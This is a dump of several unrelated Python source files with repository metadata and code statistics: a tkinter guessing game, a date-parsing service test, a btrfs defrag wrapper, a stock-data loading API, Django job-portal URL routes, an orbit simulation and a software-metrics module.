a959d03cbfea539a63e451e5c65f7cd9790d1b7f
|
[
"MIT"
] | 1
|
2020-06-05T12:42:39.000Z
|
2020-06-05T12:42:39.000Z
|
from tkinter import *
import random
from tkinter import messagebox
class GuessGame:
def protocolhandler(self):
if messagebox.askyesno("Exit", "Really Wanna stop Guessing?"):
if messagebox.askyesno("Exit", "Are you sure?"):
self.root.destroy()
def result(self):
print (" You have ran out of guesses :( i was thinking of the number: ",self.n)
lose = Label(self.root, text=" You have run out of chances :(\nand I was thinking of the number: "+str(self.n),bg='black',fg='cyan',font=5)
lose.place(x = 140,y = 500)
def check(self):
print("Checking the number provided...")
self.flag = 0
self.turn += 1
if self.flag == 0 and self.turn == 10:
self.result()
return
print("Entered number is "+ str(self.m.get()))
if self.m.get()<1 or self.m.get()>100:
print("Invalid number..")
self.invalid = Label(self.root, text="Invalid number entered.. ",bg='black',fg='cyan',font=5)
self.invalid.place(x = 140,y = 503)
elif self.m.get()==self.n:
print("Bravos,You guessed it right!!! in " +str(self.turn)+" turns")
self.flag=1
self.win = Label(self.root, text="Bravos,You guessed it right!!! in " +str(self.turn)+" turns",bg='black',fg='cyan',font=5)
self.win.place(x=130,y=503)
elif self.m.get()<self.n:
print ("Too low! You have ",10-self.turn, "guesses left!")
self.less = Label(self.root, text="Too low! You have "+str(10-self.turn)+ " guesses left!",bg='black',fg='cyan',font=5)
self.less.place(x=135,y=503)
elif self.m.get()>self.n:
print ("Too high! You have ",10-self.turn, "guesses left!")
self.more = Label(self.root, text="Too high! You have "+str(10-self.turn)+ " guesses left!",bg='black',fg='cyan',font=5)
self.more.place(x=135,y=503)
else:
print("There's some problem!!!")
self.root.destroy()
def __init__(self):
self.root = Tk()
self.root.geometry('800x600')
self.root.config(bg='black')
self.root.title('Guess Game')
self.m = IntVar()
self.status = ""
self.flag = 0
self.turn=0
self.n = random.randint(1,101)
# self.root.protocol("WM_DELETE_WINDOW", self.protocolhandler)
photo = PhotoImage(file="pythonlogoneonf.png")
label = Label(self.root, image=photo,border=0)
label.place(x=300, y=300)
self.win = Label(self.root, text="Bravos,You guessed it right!!! in " +str(self.turn)+" turns",bg='black',fg='cyan')
self.more = Label(self.root, text="Too high! You have "+str(10-self.turn)+ "guesses left!",bg='black',fg='cyan')
self.less = Label(self.root, text="Too low! You have "+str(10-self.turn)+ "guesses left!",bg='black',fg='cyan')
self.invalid = Label(self.root, text="Invalid number entered.. ",bg='black',fg='cyan')
status = Label(self.root,text = "Status: ",bg='black',fg='cyan')
status.config(font=("magneto", 20))
status.place(x=17,y=495)
title_g = Label(self.root, text="G",bg='black',fg='cyan')
# title_g.config(font=("mexicanero", 50))
title_g.config(font=("prometheus", 80))
title_g.place(x=250,y=70)
title_1 = Label(self.root, text="uess",fg='cyan',bg='black')
title_1.config(font=("prometheus", 38))
title_1.place(x=350,y=70)
title_2 = Label(self.root, text="ame",fg='cyan',bg='black')
title_2.config(font=("prometheus", 38))
title_2.place(x=370,y=125)
instructions = Label(self.root, text="Instruction: I am thinking of a number from 1-100..\nGuess it with the directions I'll provide.\nYou have 10 chances in total\nGood Luck\n:)",bg='black',fg='cyan')
instructions.config(font=("calibri", 13))
instructions.place(x=220,y=350)
guess = Label(self.root, text="Enter Your Guess here:",bg='black',fg='cyan')
guess.config(font=("fragmentcore", 13))
guess.place(x=23,y=290)
self.entry = Entry(self.root,textvariable=self.m,bg='black',fg='cyan')
self.entry.place(x=205,y=293)
button_push = Button(self.root, text="Check",bd=4,bg='black',fg='cyan', command=self.check)
button_push.place(x=350,y=285)
self.root.mainloop()
s = GuessGame()
| 42.555556
| 210
| 0.570061
| 653
| 4,596
| 3.984686
| 0.255743
| 0.079939
| 0.079939
| 0.098002
| 0.408916
| 0.330899
| 0.306303
| 0.299385
| 0.277863
| 0.267871
| 0
| 0.043223
| 0.260009
| 4,596
| 107
| 211
| 42.953271
| 0.721847
| 0.021758
| 0
| 0.049383
| 0
| 0.012346
| 0.250399
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049383
| false
| 0
| 0.037037
| 0
| 0.111111
| 0.098765
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3a5c531bfcc3cf9b1021a5ea94cb71ba7d11b0
| 1,268
|
py
|
Python
|
duckling/test/test_api.py
|
handsomezebra/zoo
|
db9ef7f9daffd34ca859d5a4d76d947e00a768b8
|
[
"MIT"
] | 1
|
2020-03-08T07:46:14.000Z
|
2020-03-08T07:46:14.000Z
|
duckling/test/test_api.py
|
handsomezebra/zoo
|
db9ef7f9daffd34ca859d5a4d76d947e00a768b8
|
[
"MIT"
] | null | null | null |
duckling/test/test_api.py
|
handsomezebra/zoo
|
db9ef7f9daffd34ca859d5a4d76d947e00a768b8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import json
import requests
import logging
import csv
url = "http://localhost:10000/parse"
def get_result(text, lang, dims, latent=None, reftime=None, tz=None):
data = {
"text": text,
"lang": lang,
"dims": json.dumps(dims)
}
if reftime is not None:
data["reftime"] = reftime
if tz is not None:
data["tz"] = tz
if latent is not None:
data["latent"] = latent
response = None
try:
response = requests.post(url, data=data)
response.raise_for_status()
except requests.exceptions.RequestException as e:
logging.warning("Service %s requests exception: %s", url, e)
if response is None:
logging.warning("Failed to call service")
return None
elif response.status_code != 200:
logging.warning("Invalid response code %d from service", response.status_code)
return None
else:
return response.json()
def test_time_en():
reftime = "1559920354000" # 6/7/2019 8:12:34 AM
time_zone = "America/Los_Angeles"
result = get_result("tomorrow at eight", "en", ["time"], reftime=reftime)
assert result is not None and result[0]["value"]["value"] == "2019-06-08T08:00:00.000-07:00"
| 23.924528
| 96
| 0.621451
| 169
| 1,268
| 4.60355
| 0.473373
| 0.041131
| 0.046272
| 0.050129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058017
| 0.252366
| 1,268
| 52
| 97
| 24.384615
| 0.762658
| 0.032334
| 0
| 0.055556
| 0
| 0
| 0.196895
| 0.023693
| 0
| 0
| 0
| 0
| 0.027778
| 1
| 0.055556
| false
| 0
| 0.111111
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3b9d3f39b8361cf623581c59d5c7de855eb076
| 943
|
py
|
Python
|
btrfslime/defrag/btrfs.py
|
tsangwpx/btrfslime
|
49c141721c532706f146fea31d2eb171c6dd698b
|
[
"MIT"
] | 3
|
2020-10-30T12:18:42.000Z
|
2022-02-06T20:17:55.000Z
|
btrfslime/defrag/btrfs.py
|
tsangwpx/btrfslime
|
49c141721c532706f146fea31d2eb171c6dd698b
|
[
"MIT"
] | null | null | null |
btrfslime/defrag/btrfs.py
|
tsangwpx/btrfslime
|
49c141721c532706f146fea31d2eb171c6dd698b
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
import os
import subprocess
from typing import AnyStr
from ..util import check_nonnegative
BTRFS_BIN = '/bin/btrfs'
def file_defrag(
target: AnyStr,
start: int = None,
size: int = None,
extent_size: int = None,
*,
flush=False,
btrfs_bin=BTRFS_BIN,
):
if isinstance(target, bytes):
target = os.fsdecode(target)
defrag_args = [btrfs_bin, 'filesystem', 'defrag']
if start is not None:
check_nonnegative('start', start)
defrag_args.extend(('-s', str(start)))
if size is not None:
check_nonnegative('size', size)
defrag_args.extend(('-l', str(size)))
if extent_size is not None:
check_nonnegative('extent_size', extent_size)
defrag_args.extend(('-t', str(extent_size)))
if flush:
defrag_args.append('-f')
defrag_args.append(os.fspath(target))
subprocess.check_call(defrag_args)
| 21.930233
| 53
| 0.652174
| 122
| 943
| 4.827869
| 0.336066
| 0.118846
| 0.04584
| 0.071307
| 0.140917
| 0.098472
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230117
| 943
| 42
| 54
| 22.452381
| 0.811295
| 0
| 0
| 0
| 0
| 0
| 0.057264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.16129
| 0
| 0.193548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3ddb0feb36d17a1b33c822d86fc630d77ff009
| 14,771
|
py
|
Python
|
fooltrader/api/quote.py
|
lcczz/fooltrader
|
fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e
|
[
"MIT"
] | 1
|
2018-04-03T06:25:24.000Z
|
2018-04-03T06:25:24.000Z
|
fooltrader/api/quote.py
|
lcczz/fooltrader
|
fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e
|
[
"MIT"
] | null | null | null |
fooltrader/api/quote.py
|
lcczz/fooltrader
|
fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
import logging
import os
from ast import literal_eval
import numpy as np
import pandas as pd
from fooltrader.consts import CHINA_STOCK_INDEX, USA_STOCK_INDEX
from fooltrader.contract import data_contract
from fooltrader.contract import files_contract
from fooltrader.contract.files_contract import get_kdata_dir, get_kdata_path
from fooltrader.settings import US_STOCK_CODES
from fooltrader.utils.utils import get_file_name, to_time_str
logger = logging.getLogger(__name__)
def convert_to_list_if_need(input):
if input and "[" in input:
return literal_eval(input)
else:
return input
# meta
def get_security_list(security_type='stock', exchanges=['sh', 'sz'], start=None, end=None,
mode='simple', start_date=None, codes=None):
"""
get security list.
Parameters
----------
security_type : str
{โstockโ, 'future'},default: stock
exchanges : list
['sh', 'sz','nasdaq','nyse','amex'],default: ['sh','sz']
start : str
the start code,default:None
only works when exchanges is ['sh','sz']
end : str
the end code,default:None
only works when exchanges is ['sh','sz']
mode : str
whether parse more security info,{'simple','es'},default:'simple'
start_date : Timestamp str or Timestamp
the filter for start list date,default:None
codes : list
the exact codes to query,default:None
Returns
-------
DataFrame
the security list
"""
if security_type == 'stock':
df = pd.DataFrame()
df_usa = pd.DataFrame()
for exchange in exchanges:
the_path = files_contract.get_security_list_path(security_type, exchange)
if os.path.exists(the_path):
if exchange == 'sh' or exchange == 'sz':
if mode == 'simple':
df1 = pd.read_csv(the_path,
converters={'code': str})
else:
df1 = pd.read_csv(the_path,
converters={'code': str,
'sinaIndustry': convert_to_list_if_need,
'sinaConcept': convert_to_list_if_need,
'sinaArea': convert_to_list_if_need})
df = df.append(df1, ignore_index=True)
elif exchange == 'nasdaq':
df_usa = pd.read_csv(the_path, dtype=str)
elif security_type == 'index':
df = pd.DataFrame(CHINA_STOCK_INDEX)
df_usa = pd.DataFrame()
if 'nasdaq' in exchanges:
df_usa = pd.DataFrame(USA_STOCK_INDEX)
if df.size > 0:
if start:
df = df[df["code"] <= end]
if end:
df = df[df["code"] >= start]
if start_date:
df['listDate'] = pd.to_datetime(df['listDate'])
df = df[df['listDate'] >= pd.Timestamp(start_date)]
df = df.set_index(df['code'], drop=False)
if df_usa.size > 0:
df_usa = df_usa.set_index(df_usa['code'], drop=False)
if codes:
df_usa = df_usa.loc[codes]
df = df.append(df_usa, ignore_index=True)
return df
def _get_security_item(code=None, id=None, the_type='stock'):
"""
get the security item.
Parameters
----------
code : str
the security code,default: None
id : str
the security id,default: None
the_type : str
the security type
Returns
-------
DataFrame
the security item
"""
df = get_security_list(security_type=the_type)
if id:
df = df.set_index(df['id'])
return df.loc[id,]
if code:
df = df.set_index(df['code'])
return df.loc[code,]
def to_security_item(security_item):
if type(security_item) == str:
if 'stock' in security_item:
security_item = _get_security_item(id=security_item, the_type='stock')
elif 'index' in security_item:
security_item = _get_security_item(id=security_item, the_type='index')
else:
security_item = _get_security_item(code=security_item)
return security_item
# tick
def get_ticks(security_item, the_date=None, start=None, end=None):
"""
get the ticks.
Parameters
----------
security_item : SecurityItem or str
the security item,id or code
the_date : TimeStamp str or TimeStamp
get the tick for the exact date
start : TimeStamp str or TimeStamp
start date
end: TimeStamp str or TimeStamp
end date
Yields
-------
DataFrame
"""
security_item = to_security_item(security_item)
if the_date:
tick_path = files_contract.get_tick_path(security_item, the_date)
yield _parse_tick(tick_path, security_item)
else:
tick_dir = files_contract.get_tick_dir(security_item)
if start or end:
if not start:
start = security_item['listDate']
if not end:
end = datetime.datetime.today()
tick_paths = [os.path.join(tick_dir, f) for f in
os.listdir(tick_dir) if
get_file_name(f) in pd.date_range(start=start, end=end)]
else:
tick_paths = [os.path.join(tick_dir, f) for f in
os.listdir(tick_dir)]
for tick_path in sorted(tick_paths):
yield _parse_tick(tick_path, security_item)
def _parse_tick(tick_path, security_item):
if os.path.isfile(tick_path):
df = pd.read_csv(tick_path)
df['timestamp'] = get_file_name(tick_path) + " " + df['timestamp']
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
df['code'] = security_item['code']
df['securityId'] = security_item['id']
return df
def get_available_tick_dates(security_item):
dir = files_contract.get_tick_dir(security_item)
return [get_file_name(f) for f in os.listdir(dir)]
# kdata
def get_kdata(security_item, the_date=None, start_date=None, end_date=None, fuquan='bfq', dtype=None, source='163',
level='day'):
"""
get kdata.
Parameters
----------
security_item : SecurityItem or str
the security item,id or code
the_date : TimeStamp str or TimeStamp
get the kdata for the exact date
start_date : TimeStamp str or TimeStamp
start date
end_date : TimeStamp str or TimeStamp
end date
fuquan : str
{"qfq","hfq","bfq"},default:"bfq"
dtype : type
the data type for the csv column,default: None
source : str
the data source,{'163','sina'},default: '163'
level : str or int
the kdata level,{1,5,15,30,60,'day','week','month'},default : 'day'
Returns
-------
DataFrame
"""
security_item = to_security_item(security_item)
# 163็ๆฐๆฎๆฏๅๅนถ่ฟ็,ๆๅคๆๅ ๅญ,้ฝๅญๅจ'bfq'็ฎๅฝไธ,ๅช้ไปไธไธชๅฐๆนๅๆฐๆฎ,ๅนถๅ็ธๅบ่ฝฌๆข
if source == '163':
the_path = files_contract.get_kdata_path(security_item, source=source, fuquan='bfq')
else:
the_path = files_contract.get_kdata_path(security_item, source=source, fuquan=fuquan)
if os.path.isfile(the_path):
if not dtype:
dtype = {"code": str, 'timestamp': str}
df = pd.read_csv(the_path, dtype=dtype)
df.timestamp = df.timestamp.apply(lambda x: to_time_str(x))
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
if the_date:
if the_date in df.index:
return df.loc[the_date]
else:
return pd.DataFrame()
if not start_date:
if security_item['type'] == 'stock':
if type(security_item['listDate']) != str and np.isnan(security_item['listDate']):
start_date = '2002-01-01'
else:
start_date = security_item['listDate']
else:
start_date = datetime.datetime.today() - datetime.timedelta(days=30)
if not end_date:
end_date = datetime.datetime.today()
if start_date and end_date:
df = df.loc[start_date:end_date]
#
if source == '163' and security_item['type'] == 'stock':
if fuquan == 'bfq':
return df
if 'factor' in df.columns:
current_factor = df.tail(1).factor.iat[0]
# ๅๅคๆๆฏไธๅ็
df.close *= df.factor
df.open *= df.factor
df.high *= df.factor
df.low *= df.factor
if fuquan == 'qfq':
# ๅๅคๆ้่ฆๆ นๆฎๆๆฐ็factorๅพๅ็ฎ
df.close /= current_factor
df.open /= current_factor
df.high /= current_factor
df.low /= current_factor
return df
return pd.DataFrame()
def get_latest_download_trading_date(security_item, return_next=True, source='163'):
df = get_kdata(security_item, source=source)
if len(df) == 0:
return pd.Timestamp(security_item['listDate'])
if return_next:
return df.index[-1] + pd.DateOffset(1)
else:
return df.index[-1]
def get_trading_dates(security_item, dtype='list', ignore_today=False, source='163', fuquan='bfq'):
df = get_kdata(security_item, source=source, fuquan=fuquan)
if dtype is 'list' and len(df.index) > 0:
dates = df.index.strftime('%Y-%m-%d').tolist()
if ignore_today:
dates = [the_date for the_date in dates if the_date != datetime.datetime.today().strftime('%Y-%m-%d')]
return dates
return dates
return df.index
def kdata_exist(security_item, year, quarter, fuquan=None, source='163'):
df = get_kdata(security_item, fuquan=fuquan, source=source)
if "{}Q{}".format(year, quarter) in df.index:
return True
return False
# TODO:use join
def merge_to_current_kdata(security_item, df, fuquan='bfq'):
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
df1 = get_kdata(security_item, source='sina', fuquan=fuquan, dtype=str)
df1 = df1.append(df)
df1 = df1.drop_duplicates(subset='timestamp', keep='last')
df1 = df1.sort_index()
the_path = files_contract.get_kdata_path(security_item, source='sina', fuquan=fuquan)
df1.to_csv(the_path, index=False)
def time_index_df(df):
df = df.set_index(df['timestamp'])
df.index = pd.to_datetime(df.index)
df = df.sort_index()
return df
def add_factor_to_163(security_item):
path_163 = get_kdata_path(security_item, source='163', fuquan='bfq')
df_163 = pd.read_csv(path_163, dtype=str)
df_163 = time_index_df(df_163)
if 'factor' in df_163.columns:
df = df_163[df_163['factor'].isna()]
if df.empty:
logger.info("{} 163 factor is ok", security_item['code'])
return
path_sina = get_kdata_path(security_item, source='sina', fuquan='hfq')
df_sina = pd.read_csv(path_sina, dtype=str)
df_sina = time_index_df(df_sina)
df_163['factor'] = df_sina['factor']
df_163.to_csv(path_163, index=False)
def merge_kdata_to_one(security_item=None, replace=False, fuquan='bfq'):
if type(security_item) != 'NoneType':
items = pd.DataFrame().append(security_item).iterrows()
else:
items = get_security_list().iterrows()
if fuquan:
fuquans = [fuquan]
else:
fuquans = ['bfq', 'hfq']
for index, security_item in items:
for fuquan in fuquans:
dayk_path = get_kdata_path(security_item, source='sina', fuquan=fuquan)
if fuquan == 'hfq':
df = pd.DataFrame(
columns=data_contract.KDATA_COLUMN_FQ)
else:
df = pd.DataFrame(
columns=data_contract.KDATA_COLUMN)
the_dir = get_kdata_dir(security_item, fuquan=fuquan)
if os.path.exists(the_dir):
files = [os.path.join(the_dir, f) for f in os.listdir(the_dir) if
('dayk.csv' not in f and os.path.isfile(os.path.join(the_dir, f)))]
for f in files:
df = df.append(pd.read_csv(f, dtype=str), ignore_index=True)
if df.size > 0:
df = df.set_index(df['timestamp'])
df.index = pd.to_datetime(df.index)
df = df.sort_index()
logger.info("{} to {}".format(security_item['code'], dayk_path))
if replace:
df.to_csv(dayk_path, index=False)
else:
merge_to_current_kdata(security_item, df, fuquan=fuquan)
for f in files:
logger.info("remove {}".format(f))
os.remove(f)
if fuquan == 'hfq':
add_factor_to_163(security_item)
if __name__ == '__main__':
print(get_security_list(security_type='stock', exchanges=['nasdaq'], codes=US_STOCK_CODES))
# item = {"code": "000001", "type": "stock", "exchange": "sz"}
# assert kdata_exist(item, 1991, 2) == True
# assert kdata_exist(item, 1991, 3) == True
# assert kdata_exist(item, 1991, 4) == True
# assert kdata_exist(item, 1991, 2) == True
# assert kdata_exist(item, 1990, 1) == False
# assert kdata_exist(item, 2017, 1) == False
#
# df1 = get_kdata(item,
# datetime.datetime.strptime('1991-04-01', settings.TIME_FORMAT_DAY),
# datetime.datetime.strptime('1991-12-31', settings.TIME_FORMAT_DAY))
# df1 = df1.set_index(df1['timestamp'])
# df1 = df1.sort_index()
# print(df1)
#
# df2 = tdx.get_tdx_kdata(item, '1991-04-01', '1991-12-31')
# df2 = df2.set_index(df2['timestamp'], drop=False)
# df2 = df2.sort_index()
# print(df2)
#
# for _, data in df1.iterrows():
# if data['timestamp'] in df2.index:
# data2 = df2.loc[data['timestamp']]
# assert data2["low"] == data["low"]
# assert data2["open"] == data["open"]
# assert data2["high"] == data["high"]
# assert data2["close"] == data["close"]
# assert data2["volume"] == data["volume"]
# try:
# assert data2["turnover"] == data["turnover"]
# except Exception as e:
# print(data2["turnover"])
# print(data["turnover"])
| 32.89755
| 115
| 0.580326
| 1,894
| 14,771
| 4.318374
| 0.121964
| 0.102702
| 0.019562
| 0.011737
| 0.346253
| 0.304194
| 0.247708
| 0.203815
| 0.158088
| 0.13608
| 0
| 0.019845
| 0.300657
| 14,771
| 448
| 116
| 32.970982
| 0.771926
| 0.209464
| 0
| 0.233871
| 0
| 0
| 0.048942
| 0
| 0
| 0
| 0
| 0.002232
| 0
| 1
| 0.060484
| false
| 0
| 0.048387
| 0
| 0.201613
| 0.004032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3f46d21ba0b951765c196ff37b42684f836343
| 432
|
py
|
Python
|
backend/jobPortal/api/urls.py
|
KshitijDarekar/hackViolet22
|
c54636d3044e1d9a7d8fa92a4d781e79f38af3ca
|
[
"MIT"
] | 2
|
2022-02-06T04:58:24.000Z
|
2022-02-06T05:31:18.000Z
|
backend/jobPortal/api/urls.py
|
KshitijDarekar/hackViolet22
|
c54636d3044e1d9a7d8fa92a4d781e79f38af3ca
|
[
"MIT"
] | 5
|
2022-02-06T05:08:04.000Z
|
2022-02-06T16:29:51.000Z
|
backend/jobPortal/api/urls.py
|
KshitijDarekar/hackViolet22
|
c54636d3044e1d9a7d8fa92a4d781e79f38af3ca
|
[
"MIT"
] | 2
|
2022-02-06T04:58:43.000Z
|
2022-02-06T17:56:23.000Z
|
from django.urls import path
from . import views
# Refer to the corresponding view function for more detials of the url routes
urlpatterns = [
path('', views.getRoutes, name="index"),
path('add/', views.addJob, name="addJob" ),
path('delete/<int:id>', views.removeJob, name="removeJob" ),
path('get-jobs/', views.getJobs, name='getJobs'),
path('company/jobs/', views.getCompanyJobs, name='getCompanyJobs'),
]
| 33.230769
| 77
| 0.685185
| 55
| 432
| 5.381818
| 0.6
| 0.060811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152778
| 432
| 12
| 78
| 36
| 0.808743
| 0.173611
| 0
| 0
| 0
| 0
| 0.230986
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c4027e0a85dd326115e24d1e6e1369d17bbdebc
| 3,135
|
py
|
Python
|
rh_project/pick_six.py
|
hrichstein/phys_50733
|
a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b
|
[
"MIT"
] | null | null | null |
rh_project/pick_six.py
|
hrichstein/phys_50733
|
a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b
|
[
"MIT"
] | null | null | null |
rh_project/pick_six.py
|
hrichstein/phys_50733
|
a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
# from scipy.constants import G
# Setting plotting parameters
from matplotlib import rc,rcParams
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rc('font', **{'family': 'serif', 'serif':['Computer Modern']})
def find_vel_init(M1, M2, a):
period = np.sqrt(4 * np.pi**2 * a**3 / G / (M1 + M2)) # period in days
print("Period is {0:.3f} years".format(period))
v = 2 * np.pi * a / period # AU/year
print(v)
return v
# def rk4_func(params):
# s1, s2, p, vs1, vs2, vp = params
# s1x, s1y = s1
# s2x, s2y = s2
# px, py = p
# # s1_vx, s1_vy = vs1
# # s2_vx, s2_vy = vs2
# # p_vx, p_vy = vp
# a1x = -G * red_mass * 0.1 / np.sqrt(0.1)**3
# a1y = -G * red_mass * 0 / np.sqrt(0.1)**3
# # R1px = abs(s1x - px)
# # R1py = abs(s1y - py)
# # R2px = abs(s2x - px)
# # R2py = abs(s2y - py)
# # R12x = abs(s1x - s2x)
# # R12y = abs(s1y - s2y)
# # R1p = np.sqrt((s1x - px)**2 + (s1y - py)*2)
# # R2p = np.sqrt((s2x - px)**2 + (s2y - py)*2)
# # R12 = A # global variable
# # a1_2x = -G * M1 * R12x / R12**3
# # a1_2y = -G * M1 * R12y / R12**3
# # a2_1x = -G * M2 * R12x
def ghetto(arr):
x, y, vx, vy = arr
ax = -G * red_mass * x / np.sqrt(x**2 + y**2)**3
# ax += -G * M1 *
ay = -G * red_mass * y / np.sqrt(x**2 + y**2)**3
ac_arr = np.array([ax, ay], float)
# print(x)
return np.array([vx, vy, ax, ay])
# Constants
G = 4 * np.pi**2 # AU^3 yr^-2 M_sun^-1
A = 0.2 # AU
r = A/2 # semi-major axis & radius
test_plan = 1 # AU
a = 0
b = .02
N = 100000
h = (b-a)/N
M1 = 1
M2 = 1
red_mass = M1*M2/(M1+M2)
tpoints = np.arange(a, b, h, dtype=int)
s1 = np.array([r, 0], float)
s2 = np.array([-r,0], float)
p = np.array([test_plan, 0], float)
s_vel = find_vel_init(M1, red_mass, r)
# s_vel = np.sqrt(10*G*red_mass)
p_vel = find_vel_init(red_mass, 0, test_plan)
print(s_vel)
s1_v0 = np.array([0, s_vel], float)
s2_v0 = np.array([0, -s_vel], float)
p_v0 = np.array([0, p_vel], float)
all_params = np.array([s1, s2, p, s1_v0, s2_v0, p_v0])
xpts_s1 = [[] for tt in range(len(tpoints))]
ypts_s1 = [[] for tt in range(len(tpoints))]
xpts_s2 = [[] for tt in range(len(tpoints))]
ypts_s2 = [[] for tt in range(len(tpoints))]
xpts_p = [[] for tt in range(len(tpoints))]
ypts_p = [[] for tt in range(len(tpoints))]
s_ghet = np.array([s1[0], s1[1], s1_v0[0], s1_v0[1]])
for tt in range(len(tpoints)):
xpts_s1[tt] = s_ghet[0]
ypts_s1[tt] = s_ghet[1]
k1 = h * ghetto(s_ghet)
k2 = h * ghetto(s_ghet + 0.5*k1)
k3 = h * ghetto(s_ghet + 0.5*k2)
k4 = h * ghetto(s_ghet + k3)
s_ghet += (k1 + 2*k2 + 2*k3 + k4) / 6
# print(s_ghet[0])
plt.plot(xpts_s1, ypts_s1)
plt.show()
# def f(s,t):
# x, y, vx, vy = s
# R = np.sqrt(x**2 + y**2)
# ax = (-GMsun * x )/R ** 3
# ay = (-GMsun * y )/R ** 3
# return np.array([vx, vy, ax, ay])
# r0 = np.array([r, 0.0], float)
# v0 = np.array([0, -s_vel], float)
# s = np.array([r0[0], r0[1], v0[0], v0[1]])
# for tt in :
# solution[j] = s
# k1 = h*f(s,t)
# k2 = h*f(s+0.5*k1,t+0.5*h)
# k3 = h*f(s+0.5*k2,t+0.5*h)
# k4 = h*f(s+k3,t+h)
# s += (k1+2*k2+2*k3+k4)/6
| 19.59375
| 71
| 0.551515
| 631
| 3,135
| 2.637084
| 0.229794
| 0.058894
| 0.033654
| 0.050481
| 0.263221
| 0.221755
| 0.198918
| 0
| 0
| 0
| 0
| 0.091732
| 0.224561
| 3,135
| 160
| 72
| 19.59375
| 0.59276
| 0.388517
| 0
| 0
| 0
| 0
| 0.04
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.051724
| 0
| 0.12069
| 0.051724
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c42036c78c029c70b9f27f5eeeede981c311ba5
| 1,704
|
py
|
Python
|
recoda/analyse/python/metrics.py
|
hansendx/recoda
|
09e25843376613b17c6b42d45e30b895b24a7d9d
|
[
"MIT"
] | null | null | null |
recoda/analyse/python/metrics.py
|
hansendx/recoda
|
09e25843376613b17c6b42d45e30b895b24a7d9d
|
[
"MIT"
] | null | null | null |
recoda/analyse/python/metrics.py
|
hansendx/recoda
|
09e25843376613b17c6b42d45e30b895b24a7d9d
|
[
"MIT"
] | null | null | null |
""" Provides functionality to calculate software metrics in python projects.
"""
from recoda.analyse.python import (
_general,
_installability,
_understandability,
_verifiability,
_correctness,
)
from recoda.analyse.independent import (
learnability,
openness
)
# pylint: disable-msg=c0103
# For now this seems to be the most streamline method of decentralization
# of this module. We want to call all functions via the metrics but we do
# not want it to be too long and unreadable. Wrapping the private module
# functions into a barebones would just lead to a lot more unnecessary code.
# Installability related metrics.
#packageability = _installability.packageability
packageability = _installability.packageability
requirements_declared = _installability.requirements_declared
docker_setup = _installability.docker_setup
singularity_setup = _installability.singularity_setup
# Learnability related metrics.
project_readme_size = learnability.project_readme_size
project_doc_size = learnability.project_doc_size
flesch_reading_ease = learnability.flesch_reading_ease
flesch_kincaid_grade = learnability.flesch_kincaid_grade
readme_flesch_reading_ease = learnability.readme_flesch_reading_ease
readme_flesch_kincaid_grade = learnability.readme_flesch_kincaid_grade
# Understandability related metrics.
average_comment_density = _understandability.average_comment_density
standard_compliance = _understandability.standard_compliance
# Openness related metrics.
license_type = openness.license_type
testlibrary_usage = _verifiability.testlibrary_usage
# Correctness related metrics.
error_density = _correctness.error_density
# General
loc = _general.count_loc
| 29.894737
| 76
| 0.834507
| 197
| 1,704
| 6.903553
